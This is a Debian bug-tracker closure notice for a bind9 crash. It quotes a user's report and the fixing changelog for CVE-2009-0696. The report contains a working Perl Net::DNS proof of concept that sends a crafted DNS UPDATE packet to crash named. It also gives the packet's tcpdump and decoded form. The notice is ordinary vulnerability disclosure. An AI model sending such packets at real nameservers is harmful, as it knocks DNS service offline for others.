Your message dated Sun, 02 Aug 2009 20:28:31 +0000 with message-id <e1mxhft-0003pu...@ries.debian.org> and subject line Bug#538975: fixed in bind9 1:9.5.1.dfsg.P3-1 has caused the Debian Bug report #538975, regarding bind9 dies with assertion failure (db.c:579) to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 538975: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=538975 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: bind9 Severity: normal bind can be crashed with an update packet: Packet in tcpdump: 15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain] Another view of the Packet: | ;; HEADER SECTION | ;; id = 181 | ;; qr = 0 opcode = UPDATE rcode = NOERROR | ;; zocount = 1 prcount = 1 upcount = 1 adcount = 1 | | ;; ZONE SECTION (1 record) | ;; 8.0.10.in-addr.arpa. IN SOA | | ;; PREREQUISITE SECTION (1 record) | 4.8.0.10.in-addr.arpa. 0 IN ANY ; no data | | ;; UPDATE SECTION (1 record) | 4.8.0.10.in-addr.arpa. 0 ANY ANY ; no data | | ;; ADDITIONAL SECTION (1 record) | office.example.com. 0 ANY TSIG HMAC-MD5.SIG-ALG.REG.INT. NOERROR Such a packet can be created with perl: ----------------- #!/usr/bin/perl -w use Net::DNS; our $NSI = '<dns server>'; our $NSI_KEY_NAME = '<key name>'; our $NSI_KEY = '<key>'; my $rzone = '<zone>'; my $rptr = "1.$rzone"; my $packet = Net::DNS::Update->new($rzone); $packet->push( pre => Net::DNS::RR->new( Name => $rptr, Class => 'IN', Type => 'ANY', TTL => 0, ) ); $packet->push( update => Net::DNS::RR->new( Name => $rptr, Class => 'ANY', Type => 'ANY', ) ); $packet->sign_tsig( $NSI_KEY_NAME, $NSI_KEY ) if $NSI_KEY_NAME && $NSI_KEY; print $packet->string; Net::DNS::Resolver->new( nameservers => [$NSI] )->send($packet); -------------------- bind only crashes, if the used fqdn exists on the nameserver. -- System Information: Debian Release: 5.0.2 APT prefers proposed-updates APT policy: (500, 'proposed-updates'), (500, 'stable') Architecture: i386 (i686) Kernel: Linux 2.6.26-1-xen-686 (SMP w/1 CPU core) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash
--- End Message ---
--- Begin Message ---Source: bind9 Source-Version: 1:9.5.1.dfsg.P3-1 We believe that the bug you reported is fixed in the latest version of bind9, which is due to be installed in the Debian FTP archive: bind9-doc_9.5.1.dfsg.P3-1_all.deb to pool/main/b/bind9/bind9-doc_9.5.1.dfsg.P3-1_all.deb bind9-host_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/bind9-host_9.5.1.dfsg.P3-1_amd64.deb bind9_9.5.1.dfsg.P3-1.diff.gz to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.diff.gz bind9_9.5.1.dfsg.P3-1.dsc to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1.dsc bind9_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/bind9_9.5.1.dfsg.P3-1_amd64.deb bind9_9.5.1.dfsg.P3.orig.tar.gz to pool/main/b/bind9/bind9_9.5.1.dfsg.P3.orig.tar.gz bind9utils_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/bind9utils_9.5.1.dfsg.P3-1_amd64.deb dnsutils_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/dnsutils_9.5.1.dfsg.P3-1_amd64.deb libbind-dev_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/libbind-dev_9.5.1.dfsg.P3-1_amd64.deb libbind9-40_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/libbind9-40_9.5.1.dfsg.P3-1_amd64.deb libdns45_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/libdns45_9.5.1.dfsg.P3-1_amd64.deb libisc45_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/libisc45_9.5.1.dfsg.P3-1_amd64.deb libisccc40_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/libisccc40_9.5.1.dfsg.P3-1_amd64.deb libisccfg40_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/libisccfg40_9.5.1.dfsg.P3-1_amd64.deb liblwres40_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/liblwres40_9.5.1.dfsg.P3-1_amd64.deb lwresd_9.5.1.dfsg.P3-1_amd64.deb to pool/main/b/bind9/lwresd_9.5.1.dfsg.P3-1_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 538...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. LaMont Jones <lam...@debian.org> (supplier of updated bind9 package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.7 Date: Tue, 28 Jul 2009 22:48:28 -0600 Source: bind9 Binary: bind9 bind9utils bind9-doc bind9-host libbind-dev libbind9-40 libdns45 libisc45 liblwres40 libisccc40 libisccfg40 dnsutils lwresd Architecture: all amd64 source Version: 1:9.5.1.dfsg.P3-1 Distribution: stable-security Urgency: low Maintainer: LaMont Jones <lam...@debian.org> Changed-By: LaMont Jones <lam...@debian.org> Description: bind9 - Internet Domain Name Server bind9-doc - Documentation for BIND bind9-host - Version of 'host' bundled with BIND 9.X bind9utils - Utilities for BIND dnsutils - Clients provided with BIND libbind-dev - Static Libraries and Headers used by BIND libbind9-40 - BIND9 Shared Library used by BIND libdns45 - DNS Shared Library used by BIND libisc45 - ISC Shared Library used by BIND libisccc40 - Command Channel Library used by BIND libisccfg40 - Config File Handling Library used by BIND liblwres40 - Lightweight Resolver Library used by BIND lwresd - Lightweight Resolver Daemon Closes: 538975 Changes: bind9 (1:9.5.1.dfsg.P3-1) stable-security; urgency=low . [Internet Software Consortium, Inc] . * A specially crafted update packet will cause named to exit. CVE-2009-0696, CERT VU#725188. Closes: #538975 Files: 358d0cdea486df897666661d78b7a8e5 601910 libs standard libdns45_9.5.1.dfsg.P3-1_amd64.deb 410430ff014240042b527bfe607621c1 64394 net standard bind9-host_9.5.1.dfsg.P3-1_amd64.deb 5d086997e4b13abb6bea5ad3c1920f08 1332918 libdevel optional libbind-dev_9.5.1.dfsg.P3-1_amd64.deb 6315afa492be63b377fe44126ae82b1b 50634 libs standard libisccfg40_9.5.1.dfsg.P3-1_amd64.deb 684dcaa493c32e3596b3685c26f173aa 154944 net standard dnsutils_9.5.1.dfsg.P3-1_amd64.deb 82679c58157e3aead368abb56dd39aa3 31816 libs standard libbind9-40_9.5.1.dfsg.P3-1_amd64.deb 8e109829ee1dd553cf4799cd9af7ef2f 1049 net optional bind9_9.5.1.dfsg.P3-1.dsc 9e7a5a67b9c681e836bd0bfa0b779004 163698 libs standard libisc45_9.5.1.dfsg.P3-1_amd64.deb ab42f6daa6d079035ef6a16eb644dabf 212176 net optional lwresd_9.5.1.dfsg.P3-1_amd64.deb bc456e91b46eab565438222f0b6e97d2 264860 doc optional bind9-doc_9.5.1.dfsg.P3-1_all.deb c878e3c0edb31dca8e74b42a0fa06efc 224291 net optional bind9_9.5.1.dfsg.P3-1.diff.gz d94a961e42289f1b1978f2b66add6dec 28820 libs standard libisccc40_9.5.1.dfsg.P3-1_amd64.deb dc87f5d14403bee19b0c1d04b4de9252 5221004 net optional bind9_9.5.1.dfsg.P3.orig.tar.gz df3664fb075f561d9b519a5517154b14 97132 net optional bind9utils_9.5.1.dfsg.P3-1_amd64.deb e193057861c47e3fad50884ffd8a5d5c 48110 libs standard liblwres40_9.5.1.dfsg.P3-1_amd64.deb f3fd746ba24e74230cba606b0a5f61ea 255048 net optional bind9_9.5.1.dfsg.P3-1_amd64.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFKb+DbzN/kmwoKyScRAtLaAJ4tTc8UsPadqLdtMwcWFuKJa4T2dQCfQ9OX 0gCyOrrhUy9K5OoHTAqIScM= =9vlB -----END PGP SIGNATURE-----
--- End Message ---
